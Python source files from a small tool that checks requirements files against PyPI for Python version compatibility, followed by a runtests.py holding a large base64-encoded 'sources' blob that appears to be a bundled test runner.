SEPRATORS = ["==", ">=", "<=", ">", "<"]
def parse_requirements_file(req_file):
"""
Parse a requirements file, returning packages with versions in a dictionary
:param req_file: requirements file to parse
:return dict of package names and versions
"""
packages = {}
for line in req_file:
line = line.strip()
for prefix in IGNORED_PREFIXES:
if not line or line.startswith(prefix):
line = None
break
if line:
line = line.strip()
# lets strip any trailing comments
if "#" in line:
line = line[:line.index("#")].strip()
if ";" in line:
line = line[:line.index(";")].strip()
use_separator = None
for separator in SEPRATORS:
if separator in line:
use_separator = separator
break
if use_separator:
package_name, version = line.split(use_separator)
#lets strip extras from the package name
if "[" in package_name:
package_name = package_name[:package_name.index("[")].strip()
packages[package_name] = version
else:
print(TERMINAL.yellow('{} not pinned to a version, skipping'.format(line)))
return packages
def check_packages(packages, python_version):
"""
Checks a list of packages for compatibility with the given Python version
Prints warning line if the package is not supported for the given Python version
If upgrading the package will allow compatibility, the version to upgrade is printed
If the package is not listed on pypi.python.org, error line is printed
:param packages: dict of packages names and versions
:param python_version: python version to be checked for support
"""
pkg_compatibility_status_list = []
for package_name, package_version in packages.items():
print(TERMINAL.bold(package_name))
package_info = CLIENT.release_data(package_name, package_version)
package_releases = CLIENT.package_releases(package_name)
if package_releases:
latest_release = package_releases[-1]
else:
latest_release = ''
pkg_status = [package_name, package_version, latest_release]
if package_releases:
supported_pythons = get_supported_pythons(package_info)
pkg_status.append(','.join(supported_pythons))
# Some entries list support of Programming Language :: Python :: 3
# So we also want to check the major revision number of the version
# against the list of supported versions
major_python_version = python_version.split('.')[0]
if python_version in supported_pythons:
print(TERMINAL.green('compatible'))
pkg_status.append(IS_COMPATIBLE)
elif major_python_version in supported_pythons:
print(TERMINAL.green('compatible'))
pkg_status.append(IS_COMPATIBLE)
else:
latest_version = package_releases[0]
latest_package_info = CLIENT.release_data(package_name, latest_version)
latest_supported_pythons = get_supported_pythons(latest_package_info)
upgrade_available = ''
if supported_pythons:
if python_version in latest_supported_pythons:
upgrade_available = ' - update to v{} for support'.format(latest_version)
print(TERMINAL.red('not compatible{}'.format(upgrade_available)))
pkg_status.append(NOT_COMPATIBLE)
else:
# We get here if there was not compatability information for
# the package version we requested
if python_version in latest_supported_pythons:
upgrade_available = ' - update to v{} for explicit support'.format(latest_version)
print(TERMINAL.yellow('not specified{}').format(upgrade_available))
pkg_status.append(UNKOWN)
else:
print(TERMINAL.red('not listed on pypi.python.org'))
pkg_status.append(NOT_IN_PYPI)
pkg_compatibility_status_list.append(pkg_status)
print('-----')
return pkg_compatibility_status_list
def get_supported_pythons(package_info):
"""
Returns a list of supported python versions for a specific package version
:param package_info: package info dictionary, retrieved from pypi.python.org
:return: Versions of Python supported, may be empty
"""
versions = []
classifiers = package_info.get('classifiers', [])
for c in classifiers:
if c.startswith('Programming Language :: Python ::'):
version = c.split(' ')[-1].strip()
versions.append(version)
return versions
def main():
"""
Parses user input for requirements files and python version to check compatibility for
:return:
"""
parser = argparse.ArgumentParser('Checks a requirements file for Python version compatibility')
parser.add_argument(
'-f', '--files', required=False,
help='requirements file(s) to check',
type=argparse.FileType(), nargs="+"
)
parser.add_argument(
'-p', '--python', required=False,
help='Version of Python to check against. E.g. 2.5',
default='.'.join(map(str, [sys.version_info.major, sys.version_info.minor]))
)
parser.add_argument(
'-o', '--output', required=False,
help='Name of file to output with compatibility status. If not provided output will only be shown in the '
'terminal. Usually a csv filename e.g. pacakges.csv',
default=False
)
args = parser.parse_args()
# If a file wasn't passed in, check if pip freeze has been piped, then try to read requirements.txt
if args.files is None:
if not sys.stdin.isatty():
args_files = [sys.stdin]
else:
try:
args_files = [open('requirements.txt')]
except IOError:
print('Default file requirements.txt not found')
sys.exit(errno.ENOENT)
else:
args_files = args.files
# Make sure Python version is in X.Y format
if re.match('^[2-3].[0-9]$', args.python) is None:
print('Python argument invalid: Must be in X.Y format, where X is 2 or 3 and Y is 0-9')
sys.exit(errno.EINVAL)
print('Checking for compatibility with Python {}'.format(args.python))
compatibility_list = []
for filepath in args_files:
print('{0}\r\n*****'.format(filepath.name))
packages = parse_requirements_file(filepath)
compatibility_list += check_packages(packages, args.python)
print('\n')
if args.output:
print("Yes")
print(compatibility_list)
with open(args.output, "w") as file_handle:
writer = csv.writer(file_handle)
writer.writerow(['package_name', 'package_version', 'latest_package_releases', 'python_versions_supported', 'is_compatible'])
for row in compatibility_list:
writer.writerow(row)
if __name__ == '__main__':
main()
```
#### File: josephbosire/checkmyreqs/runtests.py
```python
sources = """
<KEY>
<KEY>
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
